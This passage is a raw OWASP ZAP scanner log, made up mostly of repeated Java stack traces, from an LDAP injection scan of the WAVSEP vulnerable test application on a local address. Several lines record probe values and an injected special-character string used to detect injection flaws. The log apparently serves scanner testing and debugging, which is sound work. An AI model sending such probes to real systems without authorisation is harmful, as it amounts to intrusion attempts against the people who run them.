org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:188) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 18 more 11025179 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 11025179 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - A likely LDAP injection vulnerability has been found with [GET] URL [http://172.17.0.2:8080/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp?minBalanace=10000] on parameter [minBalanace], using [1*000] to simulate a logically equivalent condition, and using [ha6us] to simulate a FALSE condition. 11025374 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 11025374 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - A likely LDAP injection vulnerability has been found with [GET] URL [http://172.17.0.2:8080/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp?transactionDate=2010-02-02] on parameter [transactionDate], using [2010*02-02] to simulate a logically equivalent condition, and using [t43rc2n5t6] to simulate a FALSE condition. 11026972 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 11026972 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - A likely LDAP injection vulnerability has been found with [GET] URL [http://172.17.0.2:8080/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-GET-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp?minBalanace=10000] on parameter [minBalanace], using [1*000] to simulate a logically equivalent condition, and using [3rvkn] to simulate a FALSE condition. 11036643 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 11036644 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - A likely LDAP injection vulnerability has been found with [POST] URL [http://172.17.0.2:8080/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case18-InjectionInCalc-NumericWithoutQuotes-BooleanExploit-WithErrors.jsp] on parameter [minBalanace], using [1*000] to simulate a logically equivalent condition, and using [u81ze] to simulate a FALSE condition. 11037038 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 11037038 [ZAP-ActiveScanner-0] INFO org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - A likely LDAP injection vulnerability has been found with [POST] URL [http://172.17.0.2:8080/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case15-InjectionInSearch-DateWithoutQuotes-UnionExploit-WithErrors.jsp] on parameter [transactionDate], using [2010*01-01] to simulate a logically equivalent condition, and using [7qkohoztyt] to simulate a FALSE condition. 11037636 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.alert.ExtensionAlert - java.lang.NullPointerException 11037636 [ZAP-ActiveScanner-1] INFO org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - A likely LDAP injection vulnerability has been found with [POST] URL [http://172.17.0.2:8080/wavsep/active/SQL-Injection/SInjection-Detection-Evaluation-POST-500Error/Case08-InjectionInCalc-Numeric-BooleanExploit-WithErrors.jsp] on parameter [minBalanace], using [1*000] to simulate a logically equivalent condition, and using [8x537] to simulate a FALSE condition. 11042243 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - An error occurred checking a url for LDAP Injection issues java.lang.IllegalStateException: unsupported protocol: '172.17.0.2' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:208) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:188) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 11042248 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - An error occurred checking a url for LDAP Injection issues org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/|!<>=~=>=<=*(),+-"'\/ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:215) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:188) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 18 more 11042446 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - An error occurred checking a url for LDAP Injection issues org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/|!<>=~=>=<=*(),+-"'\/ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:215) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:188) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 18 more 11042446 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - An error occurred checking a url for LDAP Injection issues org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://|!<>=~=>=<=*(),+-"'\/ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:215) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:188) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 18 more 11042646 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - An error occurred checking a url for LDAP Injection issues org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/|!<>=~=>=<=*(),+-"'\/ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:215) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:188) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 18 more 11042647 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - An error occurred checking a url for LDAP Injection issues org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/|!<>=~=>=<=*(),+-"'\/ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:215) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:188) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 18 more 11042847 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - An error occurred checking a url for LDAP Injection issues org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://|!<>=~=>=<=*(),+-"'\/ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:215) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:188) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 18 more 11042847 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - An error occurred checking a url for LDAP Injection issues org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/|!<>=~=>=<=*(),+-"'\/ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:215) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:188) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 18 more 11043044 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - An error occurred checking a url for LDAP Injection issues java.lang.IllegalArgumentException: Host name may not be null at org.apache.commons.httpclient.HttpHost.(HttpHost.java:68) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:208) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:188) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 11043052 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - An error occurred checking a url for LDAP Injection issues java.net.UnknownHostException: http at java.net.AbstractPlainSocketImpl.connect(AbstractPlainSocketImpl.java:178) at java.net.SocksSocketImpl.connect(SocksSocketImpl.java:392) at java.net.Socket.connect(Socket.java:579) at java.net.Socket.connect(Socket.java:528) at java.net.Socket.(Socket.java:425) at java.net.Socket.(Socket.java:280) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:80) at org.apache.commons.httpclient.protocol.DefaultProtocolSocketFactory.createSocket(DefaultProtocolSocketFactory.java:122) at org.apache.commons.httpclient.HttpConnection.open(HttpConnection.java:707) at org.apache.commons.httpclient.MultiThreadedHttpConnectionManager$HttpConnectionAdapter.open(MultiThreadedHttpConnectionManager.java:1361) at org.apache.commons.httpclient.HttpMethodDirector.executeWithRetry(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:208) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:188) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 11043245 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - An error occurred checking a url for LDAP Injection issues java.lang.IllegalStateException: unsupported protocol: 'httk' at org.apache.commons.httpclient.protocol.Protocol.lazyRegisterProtocol(Protocol.java:149) at org.apache.commons.httpclient.protocol.Protocol.getProtocol(Protocol.java:117) at org.apache.commons.httpclient.HttpHost.(HttpHost.java:107) at org.apache.commons.httpclient.HttpMethodBase.setURI(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:208) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:188) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) 11043249 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - An error occurred checking a url for LDAP Injection issues org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://|!<>=~=>=<=*(),+-"'\/ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:215) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:188) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: Invalid authority at org.apache.commons.httpclient.URI.parseAuthority(URI.java:2236) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:1978) at org.apache.commons.httpclient.URI.(URI.java:147) ... 18 more 11043450 [ZAP-ActiveScanner-0] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - An error occurred checking a url for LDAP Injection issues org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: http://172.17.0.2:8080/wavsep/active/Unvalidated-Redirect/Redirect-Detection-Evaluation-GET-302Redirect/|!<>=~=>=<=*(),+-"'\/ at org.apache.commons.httpclient.HttpMethodDirector.processRedirectResponse(Unknown Source) at org.apache.commons.httpclient.HttpMethodDirector.executeMethod(Unknown Source) at org.apache.commons.httpclient.HttpClient.executeMethod(HttpClient.java:397) at org.parosproxy.paros.network.HttpSender.executeMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.runMethod(Unknown Source) at org.parosproxy.paros.network.HttpSender.send(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAuthenticated(Unknown Source) at org.parosproxy.paros.network.HttpSender.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.sendAndReceive(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:215) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection.scan(LDAPInjection.java:188) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scanVariant(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractAppParamPlugin.scan(Unknown Source) at org.parosproxy.paros.core.scanner.AbstractPlugin.run(Unknown Source) at java.lang.Thread.run(Thread.java:745) Caused by: org.apache.commons.httpclient.URIException: escaped absolute path not valid at org.apache.commons.httpclient.URI.setRawPath(URI.java:2837) at org.apache.commons.httpclient.URI.parseUriReference(URI.java:2023) at org.apache.commons.httpclient.URI.(URI.java:147) ... 18 more 11043451 [ZAP-ActiveScanner-1] ERROR org.zaproxy.zap.extension.ascanrulesAlpha.LDAPInjection - An error occurred checking a url for LDAP Injection issues org.apache.commons.httpclient.InvalidRedirectLocationException: Invalid redirect location: 